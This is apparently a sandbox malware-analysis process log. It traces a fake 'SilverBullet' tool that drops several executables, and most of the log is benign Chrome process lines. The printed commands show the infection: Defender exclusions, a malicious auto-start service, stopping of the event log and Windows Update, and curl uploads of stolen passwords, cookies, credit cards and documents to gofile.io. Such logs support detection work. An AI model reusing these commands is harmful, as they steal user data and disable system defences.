C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1624 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4632
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2920 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:2072
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2928 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:316
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4520
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3800 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4064
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5064 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:2068
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5088 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4480
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5216 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4296
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5436 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:984
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5624 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:1324
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5672 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:3148
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4056
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5968 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4500
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=5724 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:2084
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=3028 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:1444
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6180 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:360
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6540 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4180
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6476 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:3844
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
PID:1424 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6676 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:2440
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6728 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4176
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6848 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5816
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6492 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5712
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6700 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5696
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=2188 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:2324
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7112 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4836
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6672 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5176
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=996 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5208
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6192 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4392
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5504 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:360
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2320 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5464
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --mojo-platform-channel-handle=6808 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4332
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=4828 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:2928
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7032 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5204 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4836 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4796
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --mojo-platform-channel-handle=2148 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5176
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:60
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --mojo-platform-channel-handle=7080 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:2348
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5376 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:600
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3712 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:2820
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4972 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5852
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --mojo-platform-channel-handle=6924 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5732
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --mojo-platform-channel-handle=1668 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5768
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2388 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:4880
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --mojo-platform-channel-handle=6860 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5124
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6912 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:3640
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6748 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:5924
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6632 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:83⤵PID:68
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --mojo-platform-channel-handle=4736 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:4612
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --mojo-platform-channel-handle=6568 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5804
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=7052 --field-trial-handle=1852,i,13950785593731465892,17145937682261628296,131072 /prefetch:13⤵PID:5648
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\SilverBullet\" -ad -an -ai#7zMap10653:86:7zEvent266722⤵
- Suspicious use of FindShellTrayWindow
PID:68 -
C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE"C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4220 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE3⤵
- Executes dropped EXE
PID:3000 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\num3.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\num3.EXE3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num2.EXEC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num2.EXE4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2528 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jhi_service.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\jhi_service.exe5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1808 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵PID:2032
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵PID:4524
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵PID:2896
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵PID:648
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "HDNFMUHS"6⤵
- Launches sc.exe
PID:2444 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "HDNFMUHS" binpath= "C:\ProgramData\hvforlxxtnuo\kanilzbpgdul.exe" start= "auto"6⤵
- Launches sc.exe
PID:1080 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:4212 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "HDNFMUHS"6⤵
- Launches sc.exe
PID:3336 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MicrosoftEdgeUpdater.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\MicrosoftEdgeUpdater.exe5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4824 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart6⤵PID:4012
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart7⤵PID:4904
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc6⤵
- Launches sc.exe
PID:2372 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc6⤵
- Launches sc.exe
PID:3148 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv6⤵
- Launches sc.exe
PID:2612 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits6⤵
- Launches sc.exe
PID:3844 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc6⤵
- Launches sc.exe
PID:4024 -
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 06⤵PID:4368
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:2424
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 06⤵PID:2324
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4608
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 06⤵PID:2904
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:3640
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 06⤵PID:2068
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe6⤵
- Suspicious behavior: EnumeratesProcesses
PID:3036 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "YWZWALUU"6⤵
- Launches sc.exe
PID:3136 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:4616
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "YWZWALUU" binpath= "C:\ProgramData\bbskkvrqdoji\fdjrmaypnxal.exe" start= "auto"6⤵
- Launches sc.exe
PID:6020 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog6⤵
- Launches sc.exe
PID:6056 -
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "YWZWALUU"6⤵
- Launches sc.exe
PID:6064 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:6080
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num1.EXEC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\num1.EXE4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3120 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\svchost.exe5⤵
- Executes dropped EXE
PID:4076 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe5⤵
- Loads dropped DLL
PID:3460 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\System32.exe6⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
PID:5156 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"7⤵PID:2428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:5492 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"7⤵PID:5136
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:4280 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"7⤵PID:2584
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:2988 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"7⤵PID:5428
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:5960 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"7⤵PID:6044
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:5992 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"7⤵PID:5276
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:5868 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/JoinFormat.dib" https://store10.gofile.io/uploadFile"7⤵PID:1424
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:2068 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Documents/ReadBackup.vstx" https://store10.gofile.io/uploadFile"7⤵PID:3660
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Suspicious use of SetWindowsHookEx
PID:5932 -
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\validaccs.txt2⤵PID:4220
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\license.txt2⤵PID:2548
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\instructions.txt2⤵PID:5240
-
C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE"C:\Users\Admin\Downloads\SilverBullet\Silver Bullet MAIN\SilverBulletV1.4.EXE"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4668 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXEC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\nyrox.EXE3⤵
- Executes dropped EXE
PID:5928 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:2240
-
